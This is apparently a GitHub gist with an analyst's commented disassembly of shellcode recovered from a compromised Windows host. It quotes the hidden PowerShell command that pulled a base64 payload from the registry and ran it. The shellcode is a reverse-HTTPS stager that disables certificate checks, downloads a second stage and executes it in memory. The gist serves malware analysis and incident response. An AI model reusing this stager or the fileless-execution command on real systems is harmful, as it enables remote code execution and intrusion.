Last active
January 17, 2024 14:21
-
-
Save jdferrell3/4db966da06f4fa77816a54d802aca0f8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
; was used to extract it from the registry and execute it: | |
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
; The following references were used to help comment the shellcode | |
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ | |
0x00080000: cld cld | |
0x00080001: call 0x8008f | |
0x00080006: pushal pushal ; 60 | |
0x00080007: mov ebp, esp ; 98 e5 | |
0x00080009: xor edx, edx ; 31 d2 | |
0x0008000B: mov edx, dword ptr fs:[edx + 0x30] | |
0x0008000F: mov edx, dword ptr [edx + 0xc] | |
0x00080012: mov edx, dword ptr [edx + 0x14] | |
0x00080015: mov esi, dword ptr [edx + 0x28] | |
0x00080018: movzx ecx, word ptr [edx + 0x26] | |
0x0008001C: xor edi, edi | |
0x0008001E: xor eax, eax | |
0x00080020: lodsb al, byte ptr [esi] | |
0x00080021: cmp al, 0x61 | |
0x00080023: jl 0x80027 | |
0x00080025: sub al, 0x20 | |
0x00080027: ror edi, 0xd | |
0x0008002A: add edi, eax | |
0x0008002C: loop 0x8001e | |
0x0008002E: push edx | |
0x0008002F: push edi | |
0x00080030: mov edx, dword ptr [edx + 0x10] | |
0x00080033: mov eax, dword ptr [edx + 0x3c] | |
0x00080036: add eax, edx | |
0x00080038: mov eax, dword ptr [eax + 0x78] | |
0x0008003B: test eax, eax | |
0x0008003D: je 0x80089 | |
0x0008003F: add eax, edx | |
0x00080041: push eax | |
0x00080042: mov ecx, dword ptr [eax + 0x18] | |
0x00080045: mov ebx, dword ptr [eax + 0x20] | |
0x00080048: add ebx, edx | |
0x0008004A: jecxz 0x80088 | |
0x0008004C: dec ecx | |
0x0008004D: mov esi, dword ptr [ebx + ecx*4] | |
0x00080050: add esi, edx | |
0x00080052: xor edi, edi | |
0x00080054: xor eax, eax | |
0x00080056: lodsb al, byte ptr [esi] | |
0x00080057: ror edi, 0xd | |
0x0008005A: add edi, eax | |
0x0008005C: cmp al, ah | |
0x0008005E: jne 0x80054 | |
0x00080060: add edi, dword ptr [ebp - 8] | |
0x00080063: cmp edi, dword ptr [ebp + 0x24] | |
0x00080066: jne 0x8004a | |
0x00080068: pop eax | |
0x00080069: mov ebx, dword ptr [eax + 0x24] | |
0x0008006C: add ebx, edx | |
0x0008006E: mov cx, word ptr [ebx + ecx*2] | |
0x00080072: mov ebx, dword ptr [eax + 0x1c] | |
0x00080075: add ebx, edx | |
0x00080077: mov eax, dword ptr [ebx + ecx*4] | |
0x0008007A: add eax, edx | |
0x0008007C: mov dword ptr [esp + 0x24], eax | |
0x00080080: pop ebx ; 5b | |
0x00080081: pop ebx ; 5b | |
0x00080082: popal popal ; 61 | |
0x00080083: pop ecx ; 59 | |
0x00080084: pop edx ; 5a | |
0x00080085: push ecx ; 51 | |
0x00080086: jmp eax ; ff e0 | |
0x00080088: pop eax ; 58 | |
0x00080089: pop edi | |
0x0008008A: pop edx | |
0x0008008B: mov edx, dword ptr [edx] | |
0x0008008D: jmp 0x80015 | |
0x0008008F: pop ebp | |
; load wininet | |
0x00080090: push 0x74656e ; Push the bytes 'wininet',0 onto the stack. | |
0x00080095: push 0x696e6977 ; ... | |
0x0008009A: push esp ; Push a pointer to the "wininet" string on the stack. | |
0x0008009B: push 0x726774c ; hash( "kernel32.dll", "LoadLibraryA" ) | |
0x000800A0: call ebp ; LoadLibraryA( "wininet" ) | |
0x000800A2: call 0x80127 | |
; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS) | |
; INTERNETAPI_(HINTERNET) InternetOpenA( | |
; LPCSTR lpszAgent, | |
; DWORD dwAccessType, | |
; LPCSTR lpszProxy, | |
; LPCSTR lpszProxyBypass, | |
; DWORD dwFlags); | |
0x0008012C: push edi | |
0x0008012D: push edi | |
0x0008012E: push ecx | |
0x0008012F: push 0xa779563a ; hash( "wininet.dll", "InternetOpenA" ) | |
0x00080134: call ebp | |
0x00080136: jmp 0x801ce | |
; void InternetConnectA( | |
; HINTERNET hInternet, | |
; LPCSTR lpszServerName, | |
; INTERNET_PORT nServerPort, | |
; LPCSTR lpszUserName, | |
; LPCSTR lpszPassword, | |
; DWORD dwService, | |
; DWORD dwFlags, | |
; DWORD_PTR dwContext); | |
0x0008013B: pop ebx ; pop URL (hostname), store in ebx | |
0x0008013C: xor ecx, ecx ; NULL | |
0x0008013E: push ecx ; DWORD_PTR dwContext (NULL) | |
0x0008013F: push ecx ; dwFlags (NULL) | |
0x00080140: push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) | |
0x00080142: push ecx ; password (NULL) | |
0x00080143: push ecx ; username (NULL) | |
0x00080144: push 0x1bb ; port 443 | |
0x00080149: push ebx ; hostname | |
0x0008014A: push eax ; HINTERNET hInternet | |
0x0008014B: push 0xc69f8957 ; hash( "wininet.dll", "InternetConnectA" ) | |
0x00080150: call ebp | |
0x00080152: mov ebx, eax ; save hInternet | |
0x00080154: jmp 0x801d0 | |
; INTERNETAPI_(HINTERNET) HttpOpenRequestA( | |
; HINTERNET hConnect, | |
; LPCSTR lpszVerb, | |
; LPCSTR lpszObjectName, | |
; LPCSTR lpszVersion, | |
; LPCSTR lpszReferrer, | |
; LPCSTR *lplpszAcceptTypes, | |
; DWORD dwFlags, | |
; DWORD_PTR dwContext); | |
0x00080156: pop ecx | |
0x00080157: xor edx, edx ; NULL | |
0x00080159: push edx ; dwContext (NULL) | |
0x0008015A: push 0x84a03200 ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags | |
; 0x80000000 | ; INTERNET_FLAG_RELOAD | |
; 0x04000000 | ; INTERNET_NO_CACHE_WRITE | |
; 0x00800000 | ; INTERNET_FLAG_SECURE | |
; 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT | |
; 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID | |
; 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | |
; 0x00000200 ; INTERNET_FLAG_NO_UI | |
0x0008015F: push edx ; accept types (NULL) | |
0x00080160: push edx ; referrer (NULL) | |
0x00080161: push edx ; version (NULL) | |
0x00080162: push ecx ; url | |
0x00080163: push edx ; method | |
0x00080164: push eax ; hConnection | |
0x00080165: push 0x3b2e55eb ; hash( "wininet.dll", "HttpOpenRequestA" ) | |
0x0008016A: call ebp | |
0x0008016C: mov esi, eax ; hHttpRequest | |
; BOOLAPI InternetSetOptionA( | |
; HINTERNET hInternet, | |
; DWORD dwOption, | |
; LPVOID lpBuffer, | |
; DWORD dwBufferLength); | |
0x0008016E: push 0x3380 ; 0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | |
; 0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID | |
; 0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE | |
; 0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA | |
; 0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION | |
0x00080173: mov eax, esp ; move flags into eax | |
0x00080175: push 4 ; sizeof(dwFlags) | |
0x00080177: push eax ; &dwFlags | |
0x00080178: push 0x1f ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS) | |
0x0008017A: push esi ; hRequest | |
0x0008017B: push 0x869e4675 ; hash( "wininet.dll", "InternetSetOptionA" ) | |
0x00080180: call ebp | |
; BOOLAPI HttpSendRequestA( | |
; HINTERNET hRequest, | |
; LPCSTR lpszHeaders, | |
; DWORD dwHeadersLength, | |
; LPVOID lpOptional, | |
; DWORD dwOptionalLength); | |
0x00080182: xor edi, edi ; NULL | |
0x00080184: push edi ; optional length | |
0x00080185: push edi ; optional | |
0x00080186: push edi ; dwHeadersLength | |
0x00080187: push edi ; headers | |
0x00080188: push esi ; hHttpRequest | |
0x00080189: push 0x7b18062d ; hash( "wininet.dll", "HttpSendRequestA" ) | |
0x0008018E: call ebp | |
0x00080190: test eax, eax ; test for failure | |
0x00080192: je 0x801dc | |
0x00080194: xor edi, edi | |
0x00080196: test esi, esi | |
0x00080198: je 0x8019e | |
0x0008019A: mov ecx, edi | |
0x0008019C: jmp 0x801a7 | |
0x0008019E: push 0x5de2c5aa ; hash( "kernel32.dll", "GetLastError" ) | |
0x000801A3: call ebp | |
0x000801A5: mov ecx, eax | |
0x000801A7: push 0x315e2145 ; GetDesktopWindow | |
0x000801AC: call ebp | |
0x000801AE: xor edi, edi | |
0x000801B0: push edi | |
0x000801B1: push 7 | |
0x000801B3: push ecx | |
0x000801B4: push esi | |
0x000801B5: push eax | |
0x000801B6: push 0xbe057b7 ; InternetErrorDlg | |
0x000801BB: call ebp | |
0x000801BD: mov edi, 0x2f00 | |
0x000801C2: cmp edi, eax | |
0x000801C4: jne 0x801ca | |
0x000801C6: mov eax, ebx | |
0x000801C8: jmp 0x80154 | |
0x000801CA: xor edi, edi | |
0x000801CC: jmp 0x801e3 | |
0x000801CE: jmp 0x80219 | |
0x000801D0: call 0x80156 | |
0x000801D5: das das | |
0x000801D6: push ebx | |
0x000801D7: outsw dx, word ptr [esi] | |
0x000801D9: xor al, 0 | |
0x000801DB: add byte ptr [eax - 0x10], ch | |
0x000801DE: mov ch, 0xa2 | |
0x000801E0: push esi | |
0x000801E1: call ebp | |
0x000801E3: push 0x40 ; PAGE_EXECUTE_READWRITE | |
0x000801E5: push 0x1000 ; MEM_COMMIT | |
0x000801EA: push 0x400000 ; Stage allocation (8Mb ought to do us) | |
0x000801EF: push edi ; NULL | |
0x000801F0: push 0xe553a458 ; hash( "kernel32.dll", "VirtualAlloc" ) | |
0x000801F5: call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); | |
0x000801F7: xchg eax, ebx | |
0x000801F8: push ebx | |
0x000801F9: push ebx | |
0x000801FA: mov edi, esp | |
0x000801FC: push edi ; &bytesRead | |
0x000801FD: push 0x2000 ; read length | |
0x00080202: push ebx ; buffer | |
0x00080203: push esi ; hRequest | |
0x00080204: push 0xe2899612 ; hash( "wininet.dll", "InternetReadFile" ) | |
0x00080209: call ebp | |
0x0008020B: test eax, eax ; download failed? (optional?) | |
0x0008020D: je 0x801dc ; failure??? | |
0x0008020F: mov eax, dword ptr [edi] | |
0x00080211: add ebx, eax ; buffer += bytes_received | |
0x00080213: test eax, eax ; optional? | |
0x00080215: jne 0x801fc ; download_more??? | |
0x00080217: pop eax ; clear the temporary storage | |
0x00080218: ret ret ; dive into the stored stage address | |
0x00080219: call 0x8013b ; InternetConnectA | |
url: | |
; 0x0008021E: 61 | |
; url foobar.com |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment